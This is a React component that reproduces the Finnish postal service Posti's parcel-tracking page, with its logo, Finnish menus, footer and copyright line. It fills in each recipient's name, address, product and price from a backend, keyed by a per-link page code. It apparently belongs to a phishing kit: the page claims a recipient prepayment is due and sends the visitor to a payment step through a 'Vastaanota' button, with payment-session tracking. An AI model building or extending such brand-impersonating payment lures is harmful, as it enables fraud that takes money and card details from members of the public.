import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './PostiFiSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL, LOCAL_FALLBACK_API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

async function fetchPageWithFallback(pageCode) {
  const tryFetch = async (base) => {
    const res = await fetch(`${base}/api/page/${pageCode}`);
    const data = await res.json();
    return { ok: res.ok, data };
  };
  try {
    const r1 = await tryFetch(API_URL);
    if (r1.ok || (r1.data && r1.data.success)) return r1.data;
  } catch {
    /* fallback */
  }
  if (API_URL !== LOCAL_FALLBACK_API_URL) {
    try {
      const r2 = await tryFetch(LOCAL_FALLBACK_API_URL);
      return r2.data;
    } catch {
      /* ignore */
    }
  }
  return { success: false };
}

function initialsFromTitle(text) {
  if (!text || !String(text).trim()) return '?';
  const parts = String(text).trim().split(/\s+/).slice(0, 2);
  return parts.map((w) => w[0]).join('').toUpperCase().slice(0, 3);
}

/** 8 ympyrää: ensimmäinen täytetty, loput ääriviivalla (kuten Posti-skriinillä). */
function PostiProgress8() {
  return (
    <div className="posti-progress8" aria-hidden>
      {Array.from({ length: 8 }, (_, i) => (
        <span key={i} className={i === 0 ? 'posti-progress8-dot posti-progress8-dot--fill' : 'posti-progress8-dot'} />
      ))}
    </div>
  );
}

function SvgCopy({ className }) {
  return (
    <svg className={className} viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden>
      <rect x="9" y="9" width="11" height="11" rx="1.5" stroke="currentColor" strokeWidth="1.5" />
      <path
        d="M5 15H4a2 2 0 01-2-2V4a2 2 0 012-2h9a2 2 0 012 2v1"
        stroke="currentColor"
        strokeWidth="1.5"
        strokeLinecap="round"
      />
    </svg>
  );
}

function SvgLaptop({ className }) {
  return (
    <svg className={className} viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden>
      <rect x="3" y="4" width="18" height="12" rx="1.2" stroke="currentColor" strokeWidth="1.4" />
      <path d="M2 18h20" stroke="currentColor" strokeWidth="1.4" strokeLinecap="round" />
      <path d="M7 18l1-2h8l1 2" stroke="currentColor" strokeWidth="1.4" strokeLinejoin="round" />
    </svg>
  );
}

function SvgCardOrange({ className }) {
  const o = '#d87d0e';
  return (
    <svg className={className} viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden>
      <rect x="2.5" y="6" width="19" height="12" rx="2" stroke={o} strokeWidth="1.5" />
      <path d="M2.5 10h19" stroke={o} strokeWidth="1.2" />
      <rect x="5.5" y="13" width="5" height="3" rx="0.5" stroke={o} strokeWidth="1.2" />
      <circle cx="17" cy="14.5" r="1.6" stroke={o} strokeWidth="1.2" />
    </svg>
  );
}

function SvgBanknote({ className }) {
  return (
    <svg className={className} viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden>
      <rect x="4" y="6.5" width="16" height="11" rx="1.2" stroke="currentColor" strokeWidth="1.5" />
      <circle cx="12" cy="12" r="2.8" stroke="currentColor" strokeWidth="1.5" />
    </svg>
  );
}

function SvgMapPin({ className }) {
  return (
    <svg className={className} viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden>
      <path
        d="M12 21s7-4.35 7-10a7 7 0 10-14 0c0 5.65 7 10 7 10z"
        stroke="currentColor"
        strokeWidth="1.5"
        strokeLinejoin="round"
      />
      <circle cx="12" cy="11" r="2.2" stroke="currentColor" strokeWidth="1.5" />
    </svg>
  );
}

function SvgUser({ className }) {
  return (
    <svg className={className} viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden>
      <circle cx="12" cy="8" r="3.2" stroke="currentColor" strokeWidth="1.5" />
      <path
        d="M6 19c0-3.3 2.7-6 6-6s6 2.7 6 6"
        stroke="currentColor"
        strokeWidth="1.5"
        strokeLinecap="round"
      />
    </svg>
  );
}

/**
 * Posti (FI) — success, SVG:t ja sommittelu kuten skriinissä; data API:sta; app-merkit kuvana.
 */
function PostiFiSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'FI').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const currencySymbol = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${currencySymbol}` : `${priceText} ${currencySymbol}`;

  const trackingCode =
    (pageData?.tracking_number && String(pageData.tracking_number).trim()) ||
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    pageData?.page_code ||
    pageCode ||
    '—';

  const address = (pageData?.delivery_address || '').trim() || '—';
  const receiverName = (() => {
    const f = pageData?.first_name || '';
    const l = pageData?.last_name || '';
    const full = [f, l].filter(Boolean).join(' ');
    return full || '—';
  })();

  const comment = (pageData?.note || pageData?.comment || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '';
  const photoUrl = (pageData?.photo_url || '').trim();
  const showPlaceholder = !photoUrl || imgFailed;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const copyTracking = () => {
    if (trackingCode && trackingCode !== '—' && navigator.clipboard?.writeText) {
      navigator.clipboard.writeText(trackingCode).catch(() => {});
    }
  };

  if (loading && pageCode) {
    return (
      <div className="posti-wrap">
        <header className="posti-header">
          <div className="posti-header-inner">
            <div className="posti-logo">
              <img src={(process.env.PUBLIC_URL || '') + '/posti-logo.png'} alt="Posti" className="posti-logo-img" />
            </div>
          </div>
        </header>
        <main className="posti-main">
          <div className="posti-loading">Ladataan...</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="posti-wrap">
      <header className="posti-header">
        <div className="posti-header-inner">
          <a href="#/" className="posti-logo" aria-label="Posti">
            <img src={(process.env.PUBLIC_URL || '') + '/posti-logo.png'} alt="Posti" className="posti-logo-img" />
          </a>
          <nav className="posti-topnav" aria-label="Päävalikko">
            <a href="#/" className="posti-topnav-link">
              Lähettäminen
            </a>
            <a href="#/" className="posti-topnav-link posti-topnav-link--active">
              Vastaanottaminen
            </a>
            <a href="#/" className="posti-topnav-link">
              Omaposti
            </a>
            <a href="#/" className="posti-topnav-link">
              Muuttaminen
            </a>
            <a href="#/" className="posti-topnav-link">
              Ajankohtaista
            </a>
            <a href="#/" className="posti-topnav-link">
              Asiakaspalvelu
            </a>
          </nav>
          <div className="posti-header-right">
            <button type="button" className="posti-header-iconbtn" aria-label="Sijainnit">
              <SvgMapPin className="posti-header-svg" />
            </button>
            <span className="posti-lang">FI</span>
            <button type="button" className="posti-login-btn">
              <SvgUser className="posti-login-user" />
              Kirjaudu sisään
            </button>
          </div>
        </div>
      </header>

      <div className="posti-hero">
        <div className="posti-hero-inner">
          <PostiProgress8 />
          <h1 className="posti-hero-title">Pakettiseuranta</h1>
        </div>
      </div>

      <main className="posti-main">
        <section className="posti-panel">
          <div className="posti-tracking-box">
            <div className="posti-tracking-info">
              <div className="posti-tracking-label">Pakettiseuranta:</div>
              <div className="posti-tracking-value">{trackingCode}</div>
            </div>
            <button type="button" className="posti-copy-btn" onClick={copyTracking}>
              <SvgCopy className="posti-copy-svg" />
              Kopioi
            </button>
          </div>

          <h2 className="posti-status-heading">Paketin tila</h2>

          <div className="posti-status-card">
            <div className="posti-status-row">
              <SvgLaptop className="posti-status-svg posti-status-svg--laptop" />
              <p className="posti-status-text">Pakettitiedot on syötetty Posti.fi-järjestelmään.</p>
            </div>
            <div className="posti-status-row">
              <SvgCardOrange className="posti-status-svg posti-status-svg--card" />
              <p className="posti-status-text">Saajan tekemä ennakkomaksu.</p>
            </div>
          </div>

          <div className="posti-cta-wrap">
            <Link to={index2Path} className="posti-cta-btn">
              <SvgBanknote className="posti-cta-banknote" />
              Vastaanota {amountLine}
            </Link>
          </div>

          {(photoUrl || productName) && (
            <div className="posti-product-visual">
              <div className="posti-product-thumb">
                {!showPlaceholder ? (
                  <img
                    src={photoUrl}
                    alt=""
                    className="posti-product-img"
                    onError={() => setImgFailed(true)}
                  />
                ) : (
                  <span className="posti-product-ph">{initialsFromTitle(productName || 'Tuote')}</span>
                )}
              </div>
              {productName ? <div className="posti-product-caption">{productName}</div> : null}
            </div>
          )}

          <section className="posti-product">
            <h2 className="posti-product-title">Tuotetiedot</h2>
            <div className="posti-product-card">
              <div className="posti-product-col">
                <div className="posti-product-label">Toimitusosoite:</div>
                <div className="posti-product-value">{address}</div>
              </div>
              <div className="posti-product-col">
                <div className="posti-product-label">Saajan nimi:</div>
                <div className="posti-product-value">{receiverName}</div>
              </div>
              <div className="posti-product-col">
                <div className="posti-product-label">Ominaisuudet:</div>
                <div className="posti-product-value">Noutaminen toimituksen yhteydessä</div>
              </div>
              <div className="posti-product-col">
                <div className="posti-product-label">Kommentti:</div>
                <div className="posti-product-value">{comment}</div>
              </div>
            </div>
          </section>

          <section className="posti-help">
            <h2 className="posti-help-title">Tarvitsetko lisää apua?</h2>
            <p className="posti-help-text">Ota yhteyttä Posti.fi-seurannan tukeen saadaksesi lisäapua.</p>
            <button type="button" className="posti-help-faq-btn">
              FAQs
            </button>
          </section>
        </section>
      </main>

      <footer className="posti-footer">
        <div className="posti-footer-top">
          <div className="posti-footer-col">
            <h3>Seuraa meitä</h3>
            <a href="#/">Facebook</a>
            <a href="#/">Twitter</a>
            <a href="#/">LinkedIn</a>
            <a href="#/">YouTube</a>
          </div>
          <div className="posti-footer-col">
            <h3>Kansainväliset sivustot</h3>
            <a href="#/">Latvia</a>
            <a href="#/">Liettua</a>
            <a href="#/">Skandinavia</a>
            <a href="#/">Viro</a>
          </div>
          <div className="posti-footer-col">
            <h3>Oikopolut</h3>
            <a href="#/">Ota yhteyttä</a>
            <a href="#/">Tiedotteet ja häiriöt</a>
            <a href="#/">OmaPosti</a>
            <a href="#/">Lähetä paketti</a>
            <a href="#/">Verkkokauppa</a>
            <a href="#/">Työpaikat</a>
          </div>
          <div className="posti-footer-col posti-footer-col--badges">
            <h3>Lataa OmaPosti-sovellus</h3>
            <img
              src={(process.env.PUBLIC_URL || '') + '/posti-app-store-badges.png'}
              alt="Lataa App Storesta ja Google Playsta"
              className="posti-footer-badges-img"
            />
          </div>
        </div>
        <div className="posti-footer-bottom">
          <div className="posti-footer-links">
            <a href="#/">Käyttöehdot</a>
            <a href="#/">Yksityisyydensuoja</a>
            <a href="#/">Evästeet</a>
            <a href="#/">Evästeasetukset</a>
            <a href="#/">Saavutettavuusseloste</a>
          </div>
          <div className="posti-footer-copy">© Posti Group</div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default PostiFiSuccess;
